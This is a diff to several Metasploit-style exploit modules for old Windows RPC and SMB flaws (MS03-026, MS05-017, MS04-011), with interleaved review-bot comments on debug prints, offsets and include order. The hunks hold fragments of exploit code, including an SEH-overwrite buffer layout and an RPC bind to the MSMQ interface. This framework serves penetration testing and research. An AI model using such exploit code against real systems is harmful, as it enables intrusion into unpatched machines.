diff --git a/modules/exploits/windows/dcerpc/ms03_026_dcom.rb b/modules/exploits/windows/dcerpc/ms03_026_dcom.rb
index 0bb4a39491..1a8faf3880 100644
--- a/modules/exploits/windows/dcerpc/ms03_026_dcom.rb
+++ b/modules/exploits/windows/dcerpc/ms03_026_dcom.rb
@@ -185,6 +185,7 @@ class Exploits::Windows::Dcerpc::MS03_026_DCOM < Msf::Exploit::Remote
 NDR.long(1) + NDR.long(rand(0xFFFFFFFF))
+ p uncpath
 print_status('Sending exploit ...')
 begin
diff --git a/modules/exploits/windows/dcerpc/ms05_017_msmq.rb b/modules/exploits/windows/dcerpc/ms05_017_msmq.rb
index cd924b8b82..b5105e8631 100644
--- a/modules/exploits/windows/dcerpc/ms05_017_msmq.rb
+++ b/modules/exploits/windows/dcerpc/ms05_017_msmq.rb
@@ -60,13 +60,6 @@ class Exploits::Windows::Dcerpc::MS05_017_MSMQ < Msf::Exploit::Remote
 end
 def exploit
- connect
- print_status("Trying target #{target.name}...")
-
- handle = dcerpc_handle('fdb3a030-065f-11d1-bb9b-00a024ea5525', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
- print_status("Binding to #{handle} ...")
- dcerpc_bind(handle)
- print_status("Bound to #{handle} ...")
 # MSMQ supports three forms of queue names, the two we can use are
@@ -81,7 +74,7 @@ class Exploits::Windows::Dcerpc::MS05_017_MSMQ < Msf::Exploit::Remote
 queue_nlen = queue_name.length * 2
 queue_path = unicode(queue_name + "\\PRIVATE\$\\")
- buf = Rex::Text.rand_text_englishtext(4000, payload_badchars)
+ buf = Rex::Text.rand_text_english(4000, payload_badchars)
 # Windows 2000 SEH offset goes first
 buf[332 + queue_nlen + 0, 4] = [ target['Rets'][0] ].pack('V')
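Review bot: `p uncpath`, the only added line in the ms03_026_dcom hunk, is a debugging print that was left in: `p` writes `inspect` output straight to stdout and bypasses the module's `print_status` channel, and the same applies to the added `p queue_path` in the ms05_017_msmq `@@ -97,6 +90,17 @@` hunk. Either drop both before merging or route the value through the framework, e.g. `print_status("Using UNC path #{uncpath.inspect}")`. The enclosing method starts and ends outside the hunk, so where `uncpath` is built is not visible here.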
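Review bot: The corrected `Rex::Text.rand_text_english(4000, payload_badchars)` call fixes the method name, but the slice assignment right after it, `buf[332 + queue_nlen + 0, 4] = [ target['Rets'][0] ].pack('V')`, indexes a fixed 4000-byte buffer with an offset that grows with `queue_nlen`, which is derived from `queue_name` set outside this hunk; if that name can be long enough for `332 + queue_nlen` to pass 4000, `String#[]=` raises IndexError instead of producing the intended buffer, so a length check or a comment on the allowed `queue_name` size belongs next to it. The `+ 0` in that expression reads as a leftover placeholder; either drop it or give the offset a name, e.g. `win2k_seh_off = 332 + queue_nlen`, so the later offsets can be read relative to it. The `exploit` method continues past the end of the hunk.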
@@ -97,6 +90,17 @@ class Exploits::Windows::Dcerpc::MS05_017_MSMQ < Msf::Exploit::Remote
 # Get the unicode length of this string
 queue_plen = queue_path.length / 2
+ p queue_path
+
+ connect
+ print_status("Trying target #{target.name}...")
+
+ handle = dcerpc_handle('fdb3a030-065f-11d1-bb9b-00a024ea5525', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
+ print_status("Binding to #{handle} ...")
+ dcerpc_bind(handle)
+ print_status("Bound to #{handle} ...")
+
+ stubdata = NDR.long(1) + NDR.long(1) +
diff --git a/modules/exploits/windows/smb/ms04_011_lsass.rb b/modules/exploits/windows/smb/ms04_011_lsass.rb
index ca39e4cf7a..3ffdd9003f 100644
--- a/modules/exploits/windows/smb/ms04_011_lsass.rb
+++ b/modules/exploits/windows/smb/ms04_011_lsass.rb
@@ -8,8 +8,9 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
 # This module exploits a vulnerability in the LSASS service
 #
- include Exploit::Remote::SMB
 include Exploit::Remote::DCERPC
+ include Exploit::Remote::SMB
+
 def initialize(info = {})
 super(update_info(info,
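Review bot: The interface UUID and version handed to `dcerpc_handle` in the re-added block are unexplained literals; a class-level constant with a comment, e.g. `MSMQ_IFACE_UUID = 'fdb3a030-065f-11d1-bb9b-00a024ea5525' # presumably the MSMQ RPC interface — confirm`, together with the `'1.0'` version, would document what the bind targets and keep the two values from drifting apart. `connect` and `dcerpc_bind` are now called after the buffer is built, with no `ensure`/`disconnect` in view, so whether the socket is released when the bind fails depends on code outside the hunk. The `stubdata` assignment on the hunk's last line continues past it, as does the `exploit` method.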
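Review bot: Moving `include Exploit::Remote::SMB` below `include Exploit::Remote::DCERPC` changes Ruby's method lookup order — the module included last is consulted first — so any method both mixins define now resolves to the SMB version, and nothing in the hunk says this is intentional. A one-line comment above the includes, e.g. `# SMB is included after DCERPC so its methods take precedence where both mixins define the same one`, would stop the next cleanup from swapping the order back. Which methods actually overlap is not visible on this page.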